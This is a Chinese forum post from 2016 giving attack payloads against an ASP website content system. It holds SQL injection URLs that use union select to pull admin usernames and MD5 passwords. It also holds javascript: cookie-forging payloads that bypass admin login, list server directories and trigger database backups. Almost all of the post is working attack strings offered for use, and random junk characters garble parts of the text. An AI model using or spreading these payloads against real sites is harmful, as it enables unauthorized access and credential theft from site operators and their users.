一、注入5 W3 \' h5 n! r
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
/ o( c$ O3 c7 c( Z( g$ I/ t( ]* W: r, t$ [& l9 ~' V& d
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
! F& o% ~7 j8 B: `1 l6 L第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
- o9 t5 L' X3 N% I' j- [可得到用户名和MD5加密码的密码。
8 Q* D' h2 ^ V
* x! w" ]2 C& }# x v+ q二、cookies欺骗
- G/ @8 _2 h9 @7 b0 H6 i6 |$ a% k. U, \) h# e* S
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
: G4 P. }+ W! x* r, I( xjavascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"( N! }3 l! h" n7 I9 ?, w% r
; |* n2 l* {/ z2、列目录. " [5 U ^6 v2 o5 G9 F( B+ o
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
9 M: m% ]0 r% Y7 F; I' V- |* c2 T
3、数据库备份(适用性好像比较低.)
+ j: T/ k7 M! F, y' V8 `javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
+ L- \1 v$ `! O T0 A0 d6 g) z2 ]; z: o, u5 W& u, ~$ j+ T9 v' K
4、得到MD5密码解不了密进后台方法
) e6 t4 h( W; r% \( o- ^javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"2 ^5 f; w5 T3 F4 e- s7 `
|
发表于 2016-5-11 14:55:08
收藏
支持
反对